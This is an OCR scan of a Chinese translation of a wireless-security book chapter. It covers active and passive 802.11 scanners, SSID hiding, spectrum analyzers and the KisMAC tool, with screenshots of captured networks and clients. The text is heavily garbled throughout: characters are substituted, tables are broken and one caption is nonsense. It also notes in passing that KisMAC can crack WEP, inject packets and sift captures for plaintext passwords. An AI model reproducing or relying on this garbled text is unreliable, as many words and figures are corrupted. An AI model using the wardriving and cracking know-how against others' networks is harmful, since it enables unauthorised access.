了 解 航 动 扫 摘 工具 如 何 工作 ， 可 能 有 助 于 消除 它们 育 后 的 一 些 神 奇 感 竞 。 任 何 鹤 动 扫 摘 工具 的 基本 结构 都 很 简单 。 昔 先 ， 将 
无 绪 网 卡 置 于 监控 模式 或 者 假设 用 户 已 经 这 么 做 了 ; 其 次 ， 扫 摘 工 具 的 程序 内 部 进入 一 个 循环 运行 状态 ， 不 停 地 从 网 卡 读 取 数 据 
包 、 进 行 分 析 ， 当 得 到 新 的 信息 的 时 候 ， 同 时 更 新 用 户 的 显示 界面 。 

例如 ， 当 扫 摘 器 看 到 一 个 数据 包 包含 一 个 新 的 B3SID 时 ， 融 会 更 新 显示 。 当 出 现 一 个 数据 包 可 以 关联 一 个 SSID (网 络 名 称 ) 


到 该 BSSID 上 时 ， 它 也 会 更 新 其 显示 ， 并 将 其 网 络 名 称 加 上 去 。 当 扫 摘 器 看 到 一 个 新 的 信 标 帧 时 ， 只 是 将 新 的 网 络 添加 到 它 的 名 
单 中 。 被 动 扫 摘 工具 与 主动 扫 摘 工具 (探测 回复 的 数据 包 ) 一 样 也 可 以 分 析 数 据 ， 它 们 只 是 自身 不 友 送 探测 请 求 。 


国 主动 扫描 应 对 措施 


规避 主动 扫 摘 工具 相对 简单 ， 但 这 有 一 个 主要 缺点 ( 接 下 来 会 介绍 ) 。 因 为 主动 扫 摘 工具 只 处 理 两 类 数据 包 : 探测 回复 数据 
包 和 信和 标 数据 包 ， 所 以 AP 必须 分 别 使 用 两 种 不 同 的 技术 来 有 效 地 躲避 主动 扫描。 


第 一 种 技术 是 对 广播 类 的 SS1D 的 探测 请 求 不 予 回 复 。 当 然 ， 如 果 AP 看 到 一 个 探测 请 求 不 是 广播 类 的 ， 而 是 指向 目 己 (如果 
探测 请 求 包含 它 的 SSID) ， 那 么 它 融 做 出 芭 应 。 因 为 如 果 是 这 种 情况 ， 融 说 明 对 方 已 经 知道 你 的 网 络 名 称 ， 他 只 是 在 寻找 连 
接 。 相 反 ， 如 果 探 测 请 求 是 友人 送 广 播 SSID， 则 AP 残 可 以 忽略 这 个 没有 明确 目的 的 探测 请 求 。 


即使 AP 没有 回复 广播 探测 请 求 ， 但 它 仍然 可 以 在 信 标 数据 包 里 传送 目 己 的 名 字 ， 这 仍 将 不 被 视 为 隐藏 。 一 般 来 训 ， 当 接 入 
扣 设 置 为 不 回复 广播 探测 请 求 ， 扫 拉 嚣 还 要 “检查 ” 它 在 信 标 数据 包 里 的 SS1ID。 接 入 点 必须 在 信 标 数据 包 里 包含 SSID 字 段 ( 根 
据 标 准 ， 该 操作 是 强制 性 的 ) ;然而 ， 这 时 只 需要 插入 一 些 空 字 市 代替 SSID 即 可 。 


大 多 数 AP 都 包括 这 两 项 功能 。 有 时 ， 这 个 功能 称 为 “隐藏 ”模式 。 其 他 时 候 供 应 商 也 会 简单 地 在 配置 界面 上 提供 一 个 复 选 
框 , 名称 为 “广播 SSID”。 一 般 来 吕 ，AP 只 提供 一 个 禁用 开关 来 控制 广播 探测 咽 应 和 检查 信 标 中 的 SSID 字 段 ， 因 为 二 者 缺 一 不 
可 。 


你 可 能 会 认为 ， 或 许 隐 藏 AP 的 最 好 办 法 是 完全 茶 用 信和 标 功 能 。 如 果 这 样 的 话 ， 那 么 探测 请 求 出 现在 网 络 上 的 唯一 机 会 ， 融 
是 客 尸 端 在 实际 访问 该 AP 的 时 候 。 事 实 上 你 不 可 能 完全 禁用 挥 信 标 ; AP 传送 的 信 标 数据 包 具 有 更 多 的 功能 而 不 仅 仪 是 宣布 网 络 
的 存在。 如 果 一 个 AP 在 一 个 固定 的 时 间 间 隅 不 传送 某 类 信 标 ， 那 么 整个 网 络 束 瘫痪 了 。 


不 要 扎 记 ， 如 果 主 动 扫 摘 器 不 能 判断 出 一 个 网 络 的 名 字 ， 那 么 合法 客户 端 也 不 能 。 网 络 运行 在 “隐藏 ”模式 时 ， 需 要 在 终端 


用 户 上 进行 更 多 的 维护 (或 用 尸 专 有 技术 ) 。 特 别 是 ， 用 户 必须 知道 他 们 感 兴趣 的 网 络 是 什么 ， 并 把 它 的 名 字 输 到 目 己 的 操作 系 
统 中 。 


] 幅 


告 ”网 络 运行 在 隐藏 模式 会 迫使 客户 端 传送 定向 探测 请 求 ， 打 开 这 种 模式 会 引起 客户 端 通过 模拟 网 络 探测 功能 的 攻击 。 


现在 讲 讲 坏 的 方面 。 虽 然 这 一 功能 被 许多 供应 商 广 泛 实施 ， 但 是 不 推荐 局 用 。Windows 和 OS X 的 新 版 本 将 避免 传送 定向 探 
测 请 求 ， 除 非 它们 知道 它们 正在 寻找 的 网 络 是 隐藏 的 。 局 动 AP 中 的 “隐藏 ”功能 可 能 冒 管理 不 善 的 风险 。 主 动 扫描 器 很 难 找到 
你 ， 但 对 被 动 扫 摘 器 来 说 只 是 稍微 难点 。 作 为 交换 ， 你 可 以 授 使 客户 病 传 送 定 同 探 测 请 求 ， 但 该 请 求 却 害 攻击 者 可 以 坐 在 咖啡 店 
等 地 方 捕获 到 并 被 利用 。 采 用 不 广播 SSID 信 息 的 方式 ， 会 使 新 手 的 攻击 变 得 稍微 难 了 点 ， 但 对 更 多 熟练 的 攻击 者 来 说 不 过 是 徒 
增 一 个 困难 而 已 。 
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与 规避 主动 扫 摘 器 相 比 ， 规 避 航 动 扫 拍 器 是 一 个 完全 不 同 的 问题 。 无 论 人 在 信道 上 传送 什么 样 的 信息 ， 裤 动 扫 摘 工具 都 可 以 看 
到 这 些 信息 。 然 而 你 可 以 采取 一 些 切 实 可 行 的 预防 措施 尽量 减少 暴露 。 首 先 ， 当 针对 主动 扫 摘 采取 的 预防 措施 已 经 生效 时 ， 考 虑 
会 友 生 什么 ? 当 一 个 裤 动 扫 摘 器 遇 到 一 个 隐藏 的 网 络 ， 扫 摘 器 将 看 到 被 审查 的 信 标 数据 包 ， 并 知道 有 个 网 络 在 该 区 域 ， 但 是 ， 马 
不 知道 网 络 的 93ID。 使 用 被 动 扫 摘 器 时 如 何 获 得 一 个 隐藏 网 络 的 名 称 ， 详 见 第 2 章 。 


如 果 AP 文 持 它 ， 而 你 又 没有 传统 的 802.11b/g 的 客户 病 ， 那 残 茶 止 AP 上 的 混合 模式 ， 然 后 选择 严格 按照 802.11n 模 式 运 
行 。 这 种 模式 AP 传送 的 所 有 数据 包 都 使 用 802.11n 编 码 。 不 笠 的 是 ， 信 标 数 据 包 和 探测 回复 数据 包 通 单 是 用 802.11b 编 码 友 送 
的 ， 但 不 放弃 数据 包 ， 对 于 那些 仍然 使 用 802.11b/g 模 式 网 卡 的 “战争 驾驶 ”者 来 说 ， 是 一 个 好 主意 。 


另 一 种 选择 是 把 网 络 置 于 频段 为 ?GHz 的 802.11a 波 段 。 许 多 “战争 驾驶 ”者 不 扫 摘 该 学 围 ， 因 为 大 多 数 无 线 网 络 运行 在 
2.4M Hz 这 个 频段 上 ， 而 攻击 者 只 想 买 一 套 天 线 。 支 持 这 一 范围 的 网 卡 也 更 昂贵 。 


最 后 ， 智 能 天 绪 的 布置 可 以 大 大 减少 信号 沱 围 。 当 然 ， 这 泽 措施 都 不 能 使 网 络 避 开 那 些 离 你 的 AP 数 百 英尺 之 内 的 和 那些 特 
别 有 兴 趣 寻 找 你 的 网 络 的 人 。 


会 ”上 需 率 分 析 (在 数据 链 路 层 之 下 ) 
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蝶 控 模式 下 的 网 卡 可 以 让 你 看 到 在 给 定 信道 上 的 所 有 802.11 通 信 内 容 ， 但 如 果 你 想 看 看 一 个 较 低 的 级 别 将 会 怎么 样 ? 如 果 
你 只 想 看 看 是 什么 系统 运行 在 一 个 给 定 的 频率 (或 802.11 信 道 ) ”也 许 你 认为 你 的 邻居 不 知 何故 把 网 络 转 到 13 信 道 (这 是 一 些 
由 于 美国 法 律 原因 而 不 能 做 的 事情 ) ， 并 且 你 想 确 定 ， 因 此 可 以 间 他 怎么 做 到 的 。 也 许 你 想 知道 你 的 (也 许 更 重要 的 是 ,或 者 这 
是 你 的 邻居 的 ) 微波 、 无 绪 电 话 、 婴 儿 监 视 器 等 是 在 哪里 友 出 噪声 的 ， 可 以 因此 重新 定位 你 的 网 络 。 


测量 给 定 频率 上 的 能 量 值 的 工具 称 为 频谱 分 析 仪 。 独 立 的 频谱 分 析 仪 价格 为 数 干 美元 ， 是 由 专业 工程 师 使 用 的 。 然 而 ,一 些 
成 本 在 40~500 美 元 的 产品 是 专 | 用 于 帮助 解决 2.4/5GHz 频 谱 使 用 的 。 通 过 将 频段 限定 在 一 个 很 窗 的 频率 汽 围 内 ， 可 以 通过 运行 
在 笔记 本 电脑 上 的 软件 处 理 大 量 的 工作 ， 这 些 分 析 仪 可 以 实现 该 功能 。MetaGeek 是 第 一 家 提供 低 价 Wi-Spy 频 谱 分 析 仪 的 公 
司 ， 价 格 为 100 美 元 ;然而 ，Ubiquiti 最 近 友 布 一 个 芝 争 产品 AirView 频 谱 分 析 仪 ， 价 格 为 40 美 元 。 


MetaGeek 公 司 的 Wi-Spy 频 谱 分 析 仪 和 Ubiquiti 公 司 的 AirView 频 谱 分 析 仪 有 类 似 的 用 户 界面 。MetaGeek 的 最 大 优势 是 它 
的 Chanalyzer 软 件 明显 更 先进 。 对 于 初学 者 ，Chanalyzer 很 好 地 结合 了 无 线 网 卡 ， 允 许 用 频谱 分 析 仪 收集 到 的 信号 强度 信息 覆 
羡 无 线 网 卡 上 的 信息 。 目 前 ，Ubiquiti 的 AirView 软 件 缺 乏 此 功能 。Chanalyzer 软 件 的 男 一 个 特点 是 支持 三 维 视图 ， 这 人 允许 你 在 
视觉 上 以 一 种 更 直观 的 方式 跟踪 信和 号 强度 。Chanalyzer Lite 和 AirView 的 主 窗口 显示 如 图 1-5 和 图 1-6 所 示 。Chanalyzer Lite 的 
三 维 视 图 显示 如 图 1-7 所 示 。 


虽然 Ubiquiti 公 司 的 AirView 软 件 比 MetaGeek 公 司 的 Wi-Spy 软 件 便 宜 60 美 元 ， 但 其 软件 却 没有 给 人 留 下 深刻 印象 。 双 方 的 
产品 基本 上 都 支持 Linux、Windows 和 OS X 等 操作 系统 。 有 些 第 三 方程 序 与 Wi-Spy (但 不 是 AirView) 有 接口 。 有 兴趣 购买 Wi- 


Spy 软件 的 读者 要 看 每 个 产品 的 细节 ， 参 见 http://www.metageek.net/product/wi-spy-comparison。 如 果 你 更 愿意 节省 60 美 


元 ， 而 不 在 平 有 较 少 的 软件 功能 ， 那 么 可 以 从 自己 喜欢 的 Ubiquiti 经 销 商 那里 订购 AirView。 我 们 推荐 Metrix Communication 
的 产品 (http://www.metrix.net/) 。 


使 用 2.4GHz 的 频谱 分 析 仪 时 ， 为 了 防止 你 的 通信 内 容 裤 友 现 ， 唯 一 真正 的 解决 方案 是 把 它 移动 到 ?GHz 的 802.11a 流 段 ， 或 
同时 在 很 多 电 统 上 开始 运行 。 也 有 5GHz 频 率 的 频谱 分 析 仪 ， 但 它们 的 价格 更 昂贵 。Wi-Spy DBx 可 以 监测 5GHz 的 频谱 ， 价 格 是 
600 美 元 。 
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图 1-5” 带 Wi-Spy 2.4x 的 Chanalyzer Lite 主 界面 。 注 意 无 线 网 络 总 概 图 (无 线 网 络 采用 的 是 linksys 和 boondogsle 两 个 接 入 设备 ) 
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图 1-6 ”Ubiquiti 公 司 的 AirView 界 面 ， 可 视 化 地 显示 相同 的 数据 
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里 电 呈 器 FP 遭 昌 是 电 生硬 本 本 | 卫 虽 是 回 宇 十 号 短 rE | EE WE Ee he 


图 1-7 Chanalyzer Lite 的 三 维 视 图 


[1] 任何 国家 或 组 织 使 用 某 频 段 的 无 线 频率 都 需要 通过 国际 组 织 IEEE 的 统一 授权 ， 但 为 了 增加 灵活 性 ，IEEE 在 分 配 频 率 带 宽 
时 ， 某 一 些 频段 不 做 硬性 规定 ， 任 何 单位 或 组 织 可 以 不 向 国际 组 织 申请 而 直接 使 用 ， 如 2.4GHz 频 段 属于 工业 、 教 育 、 医 疗 等 专 


用 频段 ， 是 公开 的 。 译 者 注 


1.3 ”硬件 与 驱动 程序 


你 所 使 用 的 工具 表现 最 佳 时 ， 也 只 能 和 该 工具 运行 时 所 使 用 的 硬件 的 表现 一 样 好 ， 但 如 果 控 制 它 的 驱动 程序 不 知道 该 怎么 去 
实现 你 想 要 做 的 事 ， 那 么 世界 上 再 好 的 无 线 网 卡 和 心 片 组 都 是 没有 用 的 。 


本 证 将 介绍 一 些 目 前 可 用 的 驱动 程序 和 它们 所 控制 的 心 片 组， 以 及 六 有 心 片 组 的 网 卡 。 我 们 着 重 强调 Linux 驱 动 程序 ， 是 因 
为 它 将 是 当前 绝 大 多 数 开 友 中 会 遇 到 的 。 


1.4 ”本章 小 结 


本 章 简要 地 介绍 了 802.11， 还 介绍 了 祝 动 扫 摘 和 主动 扫 摘 之 间 的 差异 。 希 刻 看 完 本 章 后 ， 你 将 有 一 个 完整 的 理解 ， 理 解 是 
什么 构成 了 一 个 成 功 的 802.11 黑 客 工具 包 (天 线 、 网 卡 、 必 片 组 、 信 号 放大 器 、GPS) 。 你 已 经 对 哪些 心 片 组 在 Linux 下 获得 最 
好 的 支持 有 了 一 个 宏观 的 了 解 ， 并 友 现 了 流行 的 “战争 委 驶 ”网 卡 上 的 基本 规 范 。 第 2 章 将 详细 介绍 可 用 来 扫 描 802.11 网 络 的 软 
件 。 


第 2 章 ” 扫 摘 和 友 现 802.11 网 络 


如 前 所 述 ， 当 前 有 两 类 扫 摘 工具 : 被 动 扫描 和 主动 扫 指 。 本 章 泣 盖 了 这 两 种 类 型 的 工具 。 如 果 你 清楚 你 要 使 用 的 是 什么 操作 
系统 ， 那 么 你 束 可 以 直接 跳 转 到 该 操作 系统 所 对 应 的 工具 这 一 节 ; 如 果 你 对 其 他 操作 系统 平台 好 奇 ， 或 者 试图 通过 两 种 操作 系统 
工具 的 比较 来 确定 哪个 更 好 ， 请 继续 阅读 。 


2.1 选择 操作 系统 


第 1 章 讨 论 了 依赖 于 底层 硬件 能 力 的 各 种 攻击 技术 。 这 些 硬 件 依 赖 于 与 操作 系统 通信 的 设备 驱动 程序 ， 并 且 设 备 驱 动 程序 与 
特定 的 操作 系统 紧密 相关 。 上 此外， 不同 的 无 线 黑 客 程序 只 运行 在 一 定 的 操作 系统 平台 上 。 所 有 这 上 举 因素 加 人 在 一 起 ， 使 得 选择 一 个 
操作 系统 变 得 更 加 重要 。 


2.2 Windows 扫 描 工 具 


目前 只 有 两 个 扫描 工具 积极 支持 在 Windows 操 作 系 统 上 运行 : Metageek 和 Vistumbler 分 别 设计 的 inSSIDer， 在 设计 上 ， 
两 者 都 是 和 NetStumbler 相 似 的 主动 扫描 器 。 而 inSSIDer 支 持 GPS 全 球 定位 系统 ， 它 更 多 的 是 为 了 解决 无 线 网 络 内 部 排 错 和 跟踪 
干扰 。Vistumbler 有 更 多 的 功能 ， 最 重要 的 是 ， 它 集成 了 谷歌 地 图 (Google Earth) 的 实时 可 视 化 界面 。 当 你 查看 谷歌 地 图 的 
可 视 化 数据 时 ， 你 可 以 很 容易 地 人 在 工作 中 把 它 与 自己 的 笔记 标注 在 上 面 ， 并 且 可 以 很 容易 地 把 其 生成 的 kml 格 式 文件 应 用 在 


Linux、OS X 和 Windows 操 作 系 统 中 。 


什么 是 NetStumber 


NetStumblet 是 一 个 在 Windows XP 上 非常 流行 的 主动 打 描 器 。 虽 然 该 程序 仍 可 以 运行 在 Windows XP 上 ， 但 从 2005 年 起 ， 它 已 


不 再 使 用 了 。NetStumbler 的 工作 原理 基于 许多 NDIS 5 驱动 程序 ， 意味 着 驱动 程序 是 由 pre-Vista 写 的 。 


那些 在 老 版 本 Windows 上 使 用 NetStumbler 的 人 建议 试用 Vistumbler，Vistumbler 是 一 个 针对 Windows Vista 和 Windows 7 的 开放 源 


码 的 主动 扫描 器 ， 其 功能 和 NetStumbler 相 似 。 


2.3 ”Windows 嗅 探 工 具 / 注 入 工具 


管 没 有 本 土 Windows 基 于 “战争 鸭 驶 ”的 工具 可 用 于 支持 被 动 模式 (不 包括 市 商业 AirPcap 适 配器 的 Kismet) ， 但 少量 
工具 可 以 获得 监控 模式 以 支持 (甚至 是 数据 包 注 入 功能 ) 在 Windows 上 工作 。 区 分 这 些 工 具 与 服务 发 现 工具 的 差异 是 ， 后 者 缺 
乏 可 视 化 “战争 雪 驶 ”的 实 实在 在 的 文 持 。 在 相同 的 万 式 ，Wireshark 不 能 取代 Kismet，NetMon 和 以 下 的 产品 也 不 能 取代 它们 
作为 “战争 当 驶 ”的 实用 工具 。 


2.4 OS X 扫 拍 工 具 


2.4.1 KIsMAC 


在 Macs 操 作 系 统 上 的 被 动 扫描 器 的 名 字 叫 做 KisMAC。Michael Rossberg (aka Mick) 开发 KisMAC 多 年 了 。 尽 管 名 字 相 
似 ， 但 KisMAC 与 UNIX 操 作 系 统 上 流行 的 扫描 器 Kismet 完 全 不 同 。 最 近 ，KisMAC 的 维护 已 转交 给 了 pr0gg3d。 


兮 kisMAC (被 动 扫描 器 ) 


me 


| 


KisMAC 和 下 移 是 一 种 被 动 扫 摘 器 。 当 然 ， 它 包括 文 持 GPS 和 把 无 绪 网 卡 设置 为 监控 模式 的 功能 。 它 也 有 能 力 以 各 种 不 同 的 格 
式 保存 数据 。 


作为 一 个 扫描 器 ，KisMAC 包 括 了 一 些 与 扫 换 器 身份 天 联 度 不 大 的 功能 。 特 别 是 ， 它 支持 针对 网 络 的 各 种 攻击 。 虽 然 这 些 功 
能 将 在 本 节 中 简要 地 提 及 ， 第 4 章 将 详细 说 明 它 们 。KisMAC 也 有 针对 的 机 场 卡 和 机 场 终端 卡 的 主动 驱动 程序 。 虽 然 你 可 以 在 紧 
要 关头 使 用 这 些 设备 ， 但 你 真 的 应 该 尝试 使 用 KisMAC 被 动 驱动 程序 得 到 最 全 的 功能 。 


KisMAC 的 主 窗口 


下 图 显示 的 是 KisMAC 的 主 窗口 ， 大 部 分 列 的 意义 是 不 言 自明 的 。 注 意 窗口 底部 的 4 个 按钮 ， 这 些 按钮 提供 便捷 的 方式 来 访 
问 KisMAC 的 4 个 重点 窗口 : 网 络 (Networks) 、 数 据 通 信 (Traffic) 、 地 图 (Maps) 和 细节 (Details) 。 


KisMAC 


#|Ch ssID " IBSSID Enc |Type Signal Avg Max Packers | Data [Last Seen 


0 6 Erfan 00:23:69:C4:8B:96 WPA managed 0 38 40 70 10.03KiB 2009-10-17 14:11:22 -0 
1 1 KR81] 00:1F:90:E7:20:B9 WEP managed 0 39 40 66 6.90KiB 2009-10-17 14:12:07 -0 
29 Panera 00:03:52:AD:15:70 NO managed 65 63 97 94025 30.27MiB 2009-10-17 15:38:35 -0 
3 6 4NIO1 OO0:1F:90:E7:24:FF WEP managed 0 40 #41 3 OQ.82KiB 2009-10-17 14:11:30 -0 
46 TBISO 00:1F:90:E6:1A:A7 WEP managed 0 38 38 2 2168 2009-10-17 14:11:36 -0 


六 | [| 人 @| [QQ start scan 沽 


志 


证 志 


在 你 扫描 网 络 之 前 ， 将 不 得 不 先 告诉 KisMAC 使 用 哪 一 个 驱动 程序 。 当 然 ， 这 种 选择 取决 于 用 户 使 用 什么 样 的 网 卡 。 可 以 将 

些 驱动 程序 设置 到 KisMAC Preferences (KisMAC 偏 好 窗口 ) 中 的 Driver (驱动 程序 ) 选项 下 面 。 你 也 可 以 设置 其 他 参数 ， 
如 要 扫描 的 信道 、 跳 频 ， 以 及 是 否 将 数据 包 保 存 到 文件 中 。 如 下 图 所 示 ， 将 KisMAC 配 置 为 使 用 rt2570 驱 动 程序 扫描 所 有 美国 合 
法 信道 (信道 1~ 信 道 12) 。 因 为 选中 No dumping (不 保存 ) 单 选项 ， 所 以 KisMAC 将 不 保存 任何 数据 包 ，。 


ff 个 KisMAC Praeferences I 


Scanning Filter Sounds Driver CPS Map Traffic kismac Advanced 


Capture devices 


USB RT2570 device 


(remove | | Apple Airport or Airport Extreme card, at + | add | 


_Channel Hopping jection 
V channel1 [ViChannel 8 | | use as Primary device 
VY channel 2 [ViChannel9 i 
(ViChannel3 [Vi Channel 10 | 
ViChannel4 [ViChannel ll No dumping 
VCchannel5 [ViChannel 12 L) Keep everything 
Vichannel6 [IChannel 13 () Data only 
Vichannel7 0 门 Channel 14 Weak frames only 
站 Save Dumps Art 
start Channel: 9 /Dumplogsicurr.ocapn 


Global Settings 
Hopping Frequency: / 0.25 | 5 


Enable persistent support tor Airport Extreme passive mode 
Iregulres reboot} 


数据 通信 窗口 


kisMAC 数 据 通信 窗口 如 下 图 所 示 。 它 显示 大 量 的 数据 当前 正在 通过 网 络 传输 。 可 以 通过 配置 这 个 窗口 来 显示 数据 包 个 数 、 
字 节 数 ， 或 附近 网 络 的 信号 强度 。 下 图 显示 KisMAC 在 覆盖 范围 内 只 有 两 个 网 络 。 


YY | Signal -| 15 sec | | (7?) 


| “hidden 人 | 可 > 


:oI 二 | | Stop Scan .44 了 


细 书 窗口 


KisMAC “Detail (细节 ) ”窗口 如 下 图 所 示 ， 这 个 窗口 包 合 了 与 AP 相 关联 的 所 有 客 己 信息， 同时 也 显示 了 网 络 对 应 信道 
数据 包 个 数 等 详细 信息 。 


KisMALC 
[7 
er my Setting ee | client IVendor signal sent recv, Bytes |IP Address LastSeen 
ss|D Panera a) |FF:FF:FF:FF:FF:FF unknown 0 O86 ll.77RKIB unknown 
BSSID 00:03:52:AD:15:70 O00:03:52:AD:15 Colubris hk 74 12.61KiB 408B unknown 2009-10-. 
Vendor Colubris Nerworlks O00:1F:3C:D2:6A: Intel Corp 65 26.935KiB S807KiB 10.0.0.69 2009-=10=- 
First Seen 2009=10-=17 16:21:50 -0400 00:03:52:0A:5D Colubris k 73 B62.91KiB 28.66KiB 198.107.... 2009-10-=. 
Last Seen 2009-10-17 16:32:27 -0400 00:1F:El1:4C:B7:l Hon HaiP S58 1.81KIiB 2.86KiB 10.0.0.41 2009-10-. 
00:26:5E:2A:2E: Unknown 0 0B 2.04KiB 10.0.0.71 
Channel 9 -| 00:16:6F:0B:8D: Intel Corp 55 306B 416B 10.0.0.47 2009=10-=- 
Main Channel 9 00:13:02:6E:41: Imtel Corp 0 0B 184B unknown 
Supported Rates 1,2,5.5, 11,6,9, 12, 18, 24, 36 |- O00:14-:78:8F:ES:: ShenzZhen 0 0B 24B Unknown 
signal -8 00:23:6C:98:7C: Apple, Inc 0 OB 80B unknown 
Comment: 
前] [| | 全 | stop scan 训 
KisMAC 可 视 化 


KisMAC 文 持 GPS。 正 如 第 1 章 所 述 ， 你 将 需要 一 个 GPSs 半 置 ， 该 妆 置 具有 一 个 可 识别 的 串 行 端口 ， 并 有 文 持 的 驱动 程序 ， 
如 BU-353。 天 于 装置 识别 的 细节 参见 表面 章节 的 内 容 。 


KisMAC 生 成 Mac 计 算 机 上 所 有 可 用 的 捉 行 端口 的 一 个 列表 。 假 设 你 有 一 个 可 被 操作 系统 识别 为 捉 行 端 口 的 设备 ， 当 用 户 进 
入 “GPS Configuration (GPS 配置) ”对话 框 时 ， 应 该 能 看 串口 被 列 在 一 个 下 拉 菜 单 中 。 如 果 你 选择 了 正确 的 设备 ， 那 么 当 你 
单 击 “Maps (地 图 ) ”窗口 时 ， 可 能 会 看 到 一 条 消息 告诉 你 你 的 位 置 在 哪里 。 


KisMAC 有 内 置 文 持 的 地 图 。 为 了 避免 安 委 昂贵 的 地 图 软件 ， 你 可 以 从 服务 器 上 或 文件 中 导入 地 图 数据 。 通 过 从 文件 中 导入 
地 图 ， 可 以 得 到 任何 你 想 要 的 定制 地 图 。 从 文件 导入 地 图 需要 你 帮助 KisMAC 来 判断 大 小 。 获 得 KisMAC 地 图 最 简单 的 方式 是 从 
服务 器 下 载 。 


从 服务 器 导入 地 图 ， 可 通过 File (文件 ) |Import (导入 ) |Map From Server (从 服务 器 获得 地 图 ) 功能 实现 。 有 些 服 务 器 


已 经 标定 数据 ， 所 以 你 不 需要 做 任何 事情 。 这 些 服务 器 目前 包括 Map24 和 Expedia。 如 果 你 选择 另 一 个 服务 器 ， 你 可 能 需要 帮助 
KisMAC 判 断 地 图 规模 ， 这 可 能 导致 出 错 并 扩散 。 一 旦 导入 了 地 图 ， 你 束 会 看 到 KisMAC 中 一 个 类 似 于 下 图 的 显示 效果 。 


-Nel KisMAC 


( /KisMAC0.2.99 se ro. 


rs 


Position: 38.846527N ?7?.349266H 

Elevatiaon: 128.5 m/421.6 ft 

Velocity: 4.9 km/h (2,.6 kt) [peak: 46.4, max: 64.6] 
Track: 343 T 


Sector: 8.4 km (8.2 nm) in 2:55 (avg:; 7.2 km/h) [ERROR: -136s] 
Total: 2,8 km (ll nm) > 
Time: 2889-18=13 28:50:14 -8498 《6 sats, HODOP 1.7) 


Ee 0 


KisMAC 和 Google Earth 


KisMAC 最 近 的 版 本 支持 KML 文 件 生成 的 功能 。 人 入 和 单 地 单 击 File (文件 ) |Export To KML (导出 到 KML) 菜单 ， 然 后 在 谷歌 
地 图 中 读 入 刚 生 成 的 KML 文 件 即 可 。KisMAC 的 KML 文 件 导出 的 样 例 图 如 图 2-5 所 示 。 


注意 想 在 可 视 化 的 卫星 地 图 中 ， 实 时 地 看 到 自己 当前 位 置 的 OS X 操 作 系 统 用 户 ， 可 以 下 载 gps2gex 工 具 贞 来 达到 这 一 目的 


(http:/ /www.gtandhighwizatd.net/gps2gex.html) 。 


保存 数据 和 捕获 数据 包 


你 可 以 在 KisMAC 下 保存 两 种 类 型 的 数据 : 数据 包 捕 获 和 扫 摘 数据 。 当 保存 扫 摘 数据 时 ， 以 后 可 以 将 它 加 载 到 KisMAC 中 ， 
允许 你 在 地 图 上 定位 和 在 事后 导出 数据 。KisMAC 也 会 找到 你 上 周 友 现 的 感 兴趣 的 网 络 位 置 ， 但 记忆 它 的 位 置 有 些 麻 烦 。 
KisMAC 可 以 以 目 己 的 格式 保存 数据 ， 这 种 格式 的 文件 名 以 .kismac 结 尾 。 


i i 
| mm 


Google Earth 
aas 营 [@ 二 | 家 [ 恒 | [ 国 关 | 加 | [而 回扣 ] 男 


Places | Add Content 攻 
vB Cianni 
Sigrnal: #3 
BSSID: 00:1D:7E:59:3D:1A 
Signal: da 于 
BSSID: 00:14:BF:33:0C:E5 [| 
vO FiredogClient | 
signal: 15 入 有 全 | 
BSSID: 00:18:2F:D7:66:40 ~ om is FiredogCllent 


vO Merns wireless - ee 


Signal: 15 
BSSID: 00:18:2F:D7:66:40 
Vendor: NETGEAR Ine. 


过 Time seen: 00.42:59 (GT) 
Layers ; ml Directions: To here = FF hers 
v -iS Primary Database 


be [YY 需 Geographic Web Ss FA 
ERoads —— hen Er] 
bp 3D Buildings “ohddenissid 


Street View 
» VE Borders and Labels 
目 Traffic 


OAV 
\ ) T2009%Europa tr 区 SEE EN i Te 
kk 于 Weather g OS 由 ,| 天 
ee Imagelo.2009-.Eommonwealthlotevir " 和 > 
于 2 009 00 SN ACER : OOQ C 
\ : Se LL 二 
bp | WW Ocean a i \ GO 
kb i Clobal Awareness = ET A | EYE alt 3 Om 


图 2-5 ”KisMAC 的 谷歌 地 图 输出 


KisMAC 人 允许 保存 的 另 一 种 数据 类 型 融 是 数据 包 。 这 是 使 用 被 动 扫描 器 的 一 个 最 大 的 优点 ， 你 可 以 保 仔 所 有 收集 的 数据 ， 以 
便 以 后 分 析 使 用 。 其 中 一 个 可 能 应 用 是 : 通过 扫 摘 这 些 数据 包 文件 ， 寻 找 明文 的 用 记名 和 密码 (你 会 惊讶 有 多 少 未 加 密 的 POP 3 
服务 器 仍然 在 那里 使 用 ) 。 另 一 个 使 用 这 些 文 件 的 应 用 是 破解 无 线 网 络 本 身 。 大 多 数 针对 WEP 和 WPA 的 攻击 需要 收集 一 些 (很 
可 能 是 很 多 ) 从 目标 网 络 友 出 的 数据 包 。 第 4 章 和 第 5 章 将 详细 况 明 这 些 攻击 。 


为 了 让 KisMAC 得 到 所 保存 的 数据 包 ， 只 需 在 Driver Configuration (驱动 程序 配置 ) 界面 上 选择 所 需 的 单 选 框 。 如 果 你 不 
确定 你 所 感 兴趣 的 东西 ， 则 保存 所 有 数据 包 也 无 妨 。KisMAC 采 用 标准 开放 源码 的 pcap 文 件 格式 保存 数据 包 。 如 果 你 想 要 查看 这 
些 文件 ， 打 开 pcap 格 式 文件 最 好 的 工具 是 Wireshark， 在 OS X 操 作 系 统 上 可 以 将 Wireshark 安 装 为 一 个 本 地 应 用 程序 。 


最 后 ，KisMAC 支 持 执 行 各 种 攻击 。 目 前 ， 这 些 攻击 包括 Tim Newsham 的 21 位 WEP 密 钥 攻 击 ， 各 种 暴力 破解 模式 ， 针 对 
RC 4 调度 攻击 〈 又 名 统计 攻击 或 弱 四 攻击 ) 。 昌 然 KisMAC 攻 击 的 下 拉 菜 单 很 方便 ,但 使 用 专用 工具 进行 这 类 攻击 通常 会 得 到 更 
好 的 效果 。 


KisMAC 值 得 一 提 的 其 他 特征 包括 能 够 注入 数据 包 和 解密 WEP 加 密 的 pcap 文 件 。 目 前 ，KisMAC 是 OS X 操 作 系统 中 唯一 可 
注入 数据 包 的 工具 。 使 用 KisMAC 注 入 数据 包 ， 需 要 一 个 支持 网 卡 。 众 所 周知 的 支持 注入 的 网 卡 是 D-Link DWL-122 USB Rev 
B1 (RT2570 心 片 组 ) 和 Alfa RTL8187 网 卡 。 


[1] gps2gex，GPS-to-Google Earth 的 简称 ， 即 将 由 GPS 接 收 到 的 当前 位 置信 息 映 射 到 Google Earth 所 提供 的 卫星 地 图 相应 位 置 的 一 
个 免费 工具 软件 。 该 软件 目前 只 支持 Mac OS 义 系 统 。 


2.5 ”Linux 扫 描 工 具 


